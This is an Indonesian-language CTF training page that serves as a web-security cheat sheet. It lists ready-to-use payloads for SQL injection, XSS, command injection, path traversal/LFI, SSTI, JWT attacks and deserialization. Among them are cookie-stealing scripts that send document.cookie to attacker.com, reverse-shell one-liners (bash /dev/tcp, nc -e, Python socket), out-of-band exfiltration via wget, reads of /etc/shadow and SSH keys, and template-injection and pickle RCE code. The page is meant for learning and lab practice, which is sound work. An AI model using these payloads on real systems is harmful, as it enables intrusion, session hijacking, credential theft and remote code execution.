CTF Learning
Kembali

Web Security

Identifikasi dan eksploitasi celah keamanan aplikasi web

Tools Wajib

Burp Suitecurl / httpieDeveloper Tools (F12)sqlmapdirsearch / gobusternikto

SQL Injection (SQLi) - Complete Guide

Menengah

Teknik menyisipkan query SQL berbahaya melalui input aplikasi untuk mengakses atau memanipulasi database.

1. Authentication Bypass

Login Bypass Payloadssql
1-- Classic bypass
2admin'--
3admin'#
4admin'/*
5' OR '1'='1'--
6' OR '1'='1'#
7" OR "1"="1"--
8' OR 1=1--
9' OR 'a'='a
10') OR ('1'='1
11 
12-- Username field:
13admin'--
14' UNION SELECT 1,1,'admin'--
15' OR 1=1 LIMIT 1--
16 
17-- Password field (ketika password di-hash):
18' OR '1'='1
19anything' OR '1'='1

2. UNION-Based SQLi

Step-by-step UNION Attacksql
1-- Step 1: Find number of columns dengan ORDER BY
2' ORDER BY 1--     (OK)
3' ORDER BY 2--     (OK)
4' ORDER BY 3--     (OK)
5' ORDER BY 4--     (ERROR! → 3 columns)
6 
7-- Step 2: Find which columns are displayed
8' UNION SELECT 'a','b','c'--
9' UNION SELECT 1,2,3--
10' UNION SELECT NULL,NULL,NULL--
11 
12-- Step 3: Extract database info
13' UNION SELECT NULL,VERSION(),NULL--
14' UNION SELECT NULL,DATABASE(),NULL--
15' UNION SELECT NULL,USER(),NULL--
16 
17-- Step 4: List tables
18' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema=database()--
19 
20-- Step 5: List columns
21' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'--
22 
23-- Step 6: Extract data
24' UNION SELECT NULL,username,password FROM users--
25' UNION SELECT NULL,CONCAT(username,':',password),NULL FROM users--

3. Blind SQL Injection

Ketika tidak ada output langsung. Ekstrak data berdasarkan response behavior.

Boolean-Based Blind SQLisql
1-- Cek apakah vulnerable
2' AND 1=1--    (normal response)
3' AND 1=2--    (different response)
4 
5-- Extract data character by character
6' AND SUBSTRING(database(),1,1)='a'--
7' AND SUBSTRING(database(),1,1)='b'--
8... sampai ketemu
9 
10-- Binary search untuk mempercepat
11' AND ASCII(SUBSTRING(database(),1,1))>64--
12' AND ASCII(SUBSTRING(database(),1,1))>96--  
13' AND ASCII(SUBSTRING(database(),1,1))>112-- 
14...(binary search)
Time-Based Blind SQLisql
1-- MySQL
2' AND SLEEP(5)--
3' AND IF(1=1,SLEEP(5),0)--
4' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
5 
6-- PostgreSQL
7'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
8 
9-- MSSQL
10'; WAITFOR DELAY '0:0:5'--
11'; IF (1=1) WAITFOR DELAY '0:0:5'--

4. Second-Order SQLi

Payload disimpan, dieksekusi saat data digunakan di tempat lain.

Second Order Exampletext
11. Register dengan username: admin'--
22. Login dengan username tersebut
33. Update password...
4   → Query: UPDATE users SET password='new' WHERE username='admin'--'
5   → Ini mengubah password admin yang asli!

5. Automation dengan SQLMap

SQLMap Commandsbash
1# Basic usage
2sqlmap -u "http://target.com/page?id=1"
3 
4# Dengan cookie (jika perlu auth)
5sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123"
6 
7# POST request
8sqlmap -u "http://target.com/login" --data="username=admin&password=test"
9 
10# Enumerate databases
11sqlmap -u "http://target.com/page?id=1" --dbs
12 
13# Enumerate tables
14sqlmap -u "http://target.com/page?id=1" -D database_name --tables
15 
16# Dump table
17sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
18 
19# Get shell
20sqlmap -u "http://target.com/page?id=1" --os-shell
21 
22# Bypass WAF
23sqlmap -u "http://target.com/page?id=1" --tamper=space2comment

Cross-Site Scripting (XSS) - Complete Guide

Mudah

Menyisipkan script berbahaya ke halaman web yang akan dieksekusi oleh browser korban.

Reflected XSS

Script dari request (URL param) langsung di-reflect ke response

Stored XSS

Script disimpan di database, execute setiap halaman diload

DOM-based XSS

Script dieksekusi murni di client-side via DOM manipulation

Basic XSS Payloads

Common Payloadshtml
1<!-- Basic -->
2<script>alert('XSS')</script>
3<script>alert(document.domain)</script>
4<script>alert(document.cookie)</script>
5 
6<!-- Image tag -->
7<img src=x onerror="alert('XSS')">
8<img src=x onerror=alert('XSS')>
9<img/src=x onerror=alert('XSS')>
10 
11<!-- SVG -->
12<svg onload="alert('XSS')">
13<svg/onload=alert('XSS')>
14 
15<!-- Body/Input events -->
16<body onload="alert('XSS')">
17<input onfocus="alert('XSS')" autofocus>
18<marquee onstart="alert('XSS')">
19 
20<!-- Anchor -->
21<a href="javascript:alert('XSS')">click</a>
22 
23<!-- Iframe -->
24<iframe src="javascript:alert('XSS')">
25<iframe srcdoc="<script>alert('XSS')</script>">

Filter Bypass Techniques

Bypassing Filtershtml
1<!-- Case variation -->
2<ScRiPt>alert('XSS')</ScRiPt>
3<SCRIPT>alert('XSS')</SCRIPT>
4 
5<!-- Encoding -->
6<script>alert(String.fromCharCode(88,83,83))</script>
7<img src=x onerror="alert(&#39;XSS&#39;)">
8<img src=x onerror="alert('XSS')">
9 
10<!-- Double encoding -->
11%253Cscript%253Ealert('XSS')%253C/script%253E
12 
13<!-- Without parentheses -->
14<script>alert`XSS`</script>
15<script>onerror=alert;throw'XSS'</script>
16 
17<!-- Without quotes -->
18<script>alert(document.domain)</script>
19<img src=x onerror=alert(1)>
20 
21<!-- Breaking out of attributes -->
22"><script>alert('XSS')</script>
23'><script>alert('XSS')</script>
24</script><script>alert('XSS')</script>
25 
26<!-- Using eval -->
27<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>
28 
29<!-- Template literals -->
30<script>alert`XSS`</script>

Cookie Stealing Payload

Exfiltrate Cookieshtml
1<!-- Send cookies to attacker server -->
2<script>
3new Image().src='http://attacker.com/steal?c='+document.cookie;
4</script>
5 
6<script>
7fetch('http://attacker.com/steal?c='+document.cookie);
8</script>
9 
10<script>
11document.location='http://attacker.com/steal?c='+document.cookie;
12</script>
13 
14<!-- Using webhook.site for testing -->
15<script>
16fetch('https://webhook.site/your-id?c='+document.cookie);
17</script>

DOM-based XSS

Vulnerable DOM Sinksjavascript
1// Vulnerable patterns (sinks):
2document.write(user_input)
3element.innerHTML = user_input
4element.outerHTML = user_input
5eval(user_input)
6setTimeout(user_input, 1000)
7setInterval(user_input, 1000)
8location = user_input
9location.href = user_input
10 
11// Sources (where input comes from):
12location.search      // URL query string
13location.hash        // URL fragment
14document.referrer    // Referrer header
15document.cookie      // Cookies
16window.name          // Window name
17 
18// Example vulnerable code:
19var pos = document.URL.indexOf("name=") + 5;
20document.write(document.URL.substring(pos, document.URL.length));
21 
22// Exploit:
23// http://target.com/page#name=<script>alert('XSS')</script>

Command Injection

Menengah

Eksekusi perintah OS melalui input yang tidak difilter dengan benar.

Command Injection Payloadsbash
1# Command separators
2; ls
3| ls
4|| ls
5& ls
6&& ls
7`ls`
8$(ls)
9 
10# Newline
11%0als
12%0d%0als
13 
14# Examples:
15# Vulnerable: ping $_GET['ip']
16127.0.0.1; cat /etc/passwd
17127.0.0.1 | cat /etc/passwd
18127.0.0.1 && cat /etc/passwd
19`cat /etc/passwd`
20$(cat /etc/passwd)
21 
22# Blind command injection (no output)
23; sleep 10                    # Time-based
24; curl http://attacker.com    # Out-of-band
25; wget http://attacker.com/$(whoami)
26 
27# Getting reverse shell
28; bash -i >& /dev/tcp/attacker/4444 0>&1
29; nc attacker 4444 -e /bin/bash
30; python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Filter Bypassbash
1# Space bypass
2{cat,/etc/passwd}
3cat${IFS}/etc/passwd
4cat$IFS/etc/passwd
5X=$'cat\x20/etc/passwd'&&$X
6 
7# Keyword bypass
8c'a't /etc/passwd
9c"a"t /etc/passwd
10c\at /etc/passwd
11/???/??t /etc/passwd
12 
13# Using wildcards
14/???/c?t /???/p?????
15 
16# Base64 encoded
17echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash

Path Traversal & Local File Inclusion (LFI)

Mudah

Akses file di luar direktori yang diizinkan melalui manipulasi path.

Path Traversal Payloadstext
1# Basic traversal
2../../../etc/passwd
3....//....//....//etc/passwd
4..%2f..%2f..%2fetc/passwd
5%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
6 
7# Double encoding
8..%252f..%252f..%252fetc/passwd
9 
10# Null byte (older PHP)
11../../../etc/passwd%00
12../../../etc/passwd%00.jpg
13 
14# Important files to read:
15/etc/passwd
16/etc/shadow (if lucky)
17/etc/hosts
18/proc/self/environ
19/var/log/apache2/access.log
20/var/log/apache2/error.log
21~/.bash_history
22~/.ssh/id_rsa
LFI to RCEphp
1// PHP Wrappers for LFI
2// Read source code:
3php://filter/convert.base64-encode/resource=index.php
4 
5// RCE via data wrapper:
6data://text/plain,<?php system($_GET['cmd']); ?>
7data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
8 
9// RCE via input wrapper (POST body contains PHP):
10php://input
11 
12// Log poisoning:
13// 1. Include User-Agent dengan PHP code di access.log
14// 2. LFI ke /var/log/apache2/access.log
Useful LFI Targetsbash
1# Linux files
2/etc/passwd
3/etc/shadow
4/etc/hosts
5/etc/hostname
6/proc/version
7/proc/self/cmdline
8/proc/self/environ
9/proc/self/fd/[0-9]*
10/var/log/apache2/access.log
11/var/log/apache2/error.log
12 
13# Windows files
14C:\Windows\System32\drivers\etc\hosts
15C:\Windows\win.ini
16C:\Windows\System32\config\SAM
17C:\inetpub\logs\LogFiles\
18 
19# Application files
20.htaccess
21config.php
22wp-config.php
23.env
24.git/config

Insecure Direct Object Reference (IDOR)

Mudah

Akses objek/data lain tanpa otorisasi dengan memanipulasi parameter referensi.

IDOR Exampleshttp
1# Numeric IDs
2GET /api/user/123/profile   → try 124, 125, 1, 0
3GET /download?id=456        → try 457, 1
4POST /api/order/789/cancel  → try other order IDs
5 
6# UUIDs (harder but possible)
7GET /doc/550e8400-e29b-41d4-a716-446655440000
8# Try: increment last digits, or find other UUIDs
9 
10# Encoded IDs
11GET /profile?id=MTIz          (base64 of "123")
12# Decode, change, re-encode
13 
14# Hashed IDs
15GET /reset?token=5d41402abc4b2a76b9719d911017c592
16# If MD5 of user ID, generate for other IDs
17 
18# In request body
19POST /api/transfer
20{"from": 123, "to": 456, "amount": 100}
21# Change "from" to victim's account
22 
23# File access
24GET /uploads/user_123/document.pdf
25# Try: user_124, user_1, admin
IDOR Hunting Tips
  • • Cari semua parameter yang terlihat seperti ID
  • • Test dengan ID user lain, ID 0, ID 1, ID negatif
  • • Cek API endpoints di JS files
  • • Perhatikan response berbeda (403 vs 200 vs 404)

Server-Side Template Injection (SSTI)

Sulit

Menyisipkan kode template yang dieksekusi di server untuk RCE atau data extraction.

Detection Payloadstext
1# Test untuk vulnerability:
2{{7*7}}          → 49 = Jinja2/Twig
3${7*7}          → 49 = Freemarker/Velocity
4#{7*7}           → 49 = Ruby ERB
5<%= 7*7 %>       → 49 = ERB
6{{7*'7'}}        → 7777777 = Jinja2
7{{config}}       → Config object = Jinja2
8 
9# Polyglot detection:
10$\{\{<%[%'"}}%\\.
Jinja2 (Flask/Python) Exploitationpython
1# Read file
2{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
3 
4# RCE - Method 1
5{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
6 
7# RCE - Method 2
8{{ ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['builtins']['eval']("__import__('os').popen('id').read()") }}
9 
10# RCE - Method 3 (shorter)
11{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
12 
13# Popular payload
14{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}
Twig (PHP) Exploitationphp
1# Read file
2{{'/etc/passwd'|file_excerpt(1,30)}}
3 
4# RCE
5{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
6 
7# RCE - system
8{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("cat /etc/passwd")}}
Freemarker (Java) Exploitationjava
1# RCE
2<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") }
3 
4# Alternative
5[#assign ex = 'freemarker.template.utility.Execute'?new()]
6${ ex('id') }

Authentication Bypass Techniques

Menengah

Berbagai cara melewati mekanisme autentikasi.

Common Auth Bypass Methodstext
11. SQL Injection (covered above)
2 
32. Default Credentials
4   admin:admin, admin:password, admin:123456
5   root:root, root:toor, test:test
6   guest:guest
7 
83. JWT Attacks
9   - Change algorithm to "none"
10   - Bruteforce weak secret
11   - Kid parameter injection
12 
134. Session Fixation
14   - Inject known session ID
15 
165. Password Reset Flaws
17   - Token reuse
18   - Predictable tokens
19   - Host header injection
20 
216. Mass Assignment
22   - Add "role":"admin" or "is_admin":true to request
23 
247. Type Juggling (PHP)
25   - "password" == 0 returns true
26   - Send integer instead of string
27 
288. Registration bypass
29   - Register as admin@target.com (case: Admin@target.com)
JWT Attacksjavascript
1// Original JWT
2eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoibm9ybWFsIn0.signature
3 
4// Attack 1: Algorithm None
5// Change header to: {"alg":"none","typ":"JWT"}
6// Remove signature
7 
8// Attack 2: Weak secret bruteforce
9john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256
10 
11// Attack 3: Change payload
12// Decode, change "role":"admin", re-encode
13 
14// Tools:
15// - jwt.io (decode/encode)
16// - jwt_tool
17// - hashcat -m 16500

Deserialization Vulnerabilities

Sulit

Eksploitasi kerentanan dalam proses deserialisasi objek.

PHP Deserializationphp
1// Vulnerable code
2$obj = unserialize($_GET['data']);
3 
4// If class has magic methods like __wakeup, __destruct
5// They get called automatically
6 
7// Example malicious serialized object:
8O:4:"User":2:{s:4:"name";s:5:"admin";s:8:"is_admin";b:1;}
9 
10// Tools: PHPGGC for gadget chains
11phpggc Laravel/RCE1 system 'id' -b
Python Pickle Deserializationpython
1import pickle
2import base64
3import os
4 
5class RCE:
6    def __reduce__(self):
7        return (os.system, ('id',))
8 
9payload = base64.b64encode(pickle.dumps(RCE())).decode()
10print(payload)
11 
12# Jika aplikasi melakukan:
13# pickle.loads(base64.b64decode(user_input))
14# Akan execute 'id' command

Practice Resources

PortSwigger Web Security Academy

Free labs untuk semua web vulns

OWASP Juice Shop

Vulnerable web app untuk practice

PayloadsAllTheThings

Comprehensive payload list

HackTricks

Techniques & methodology wiki